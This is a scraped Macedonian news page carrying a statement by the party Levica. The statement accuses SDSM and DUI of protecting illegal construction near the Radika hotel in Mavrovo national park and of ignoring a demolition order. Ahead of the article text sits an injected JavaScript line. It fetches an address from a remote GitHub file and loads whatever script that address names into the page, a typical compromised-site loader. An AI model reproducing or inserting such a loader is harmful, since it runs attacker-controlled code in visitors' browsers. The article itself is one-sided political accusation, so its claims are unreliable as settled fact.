;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица: СДСМ и ДУИ во одбрана на градежната мафија во Маврово - Антропол
АктуелноЛокално

Левица: СДСМ и ДУИ во одбрана на градежната мафија во Маврово

Жителите на Маврово бараат објаснување зошто не се почитува донесеното Решение од страна на Општина Маврово, донесено на 15.09.2021, во кое на инвеститорот „Радика Ресорт” му се дава рок од 15 дена за уривање на девет куќи што бесправно се градат под хотелот Радика во село Леуново, Маврово.

Во Решението, освен што е оставен рок од 15 дена за Инвеститорот сам да ги сруши дивограбите, наведено е дека: „ако градбата не се отстрани во определениот рок, ќе се пристапи кон присилно административно извршување на решението“. За отстранување на споменатите куќи сѐ уште се чека, а изминати се речиси 2 месеци од донесеното решение.


Дополнително, инвеститорот продолжува со неговите градежни активности, додека градоначалникот од СДСМ, Медат Куртовски, на само неколку дена пред локалните избори, наплатил комуналии за уште 22 објекта од предвидените 87!

Дали ваквиот криминал е заштитен директно од власта, со оглед на тоа што постојат индиции дека фирма на поранешен директор на јавно претпријатие од редовите на ДУИ е инволвирана во градбата?

Потсетуваме дека статусот на Националниот парк Маврово не е редифиниран и не се исцртани забранетите зони за градење, иако според Законот за заштита на природата од 2013 година, постои обврска за репрогласување на Националниот парк. Криминалната коалиција на СДСМ и ДУИ е целосно ставена во служба на интересите на градежната мафија, додека неповратно се уништува природно богатство и се загрозува опстанокот на еден од најстарите национални паркови.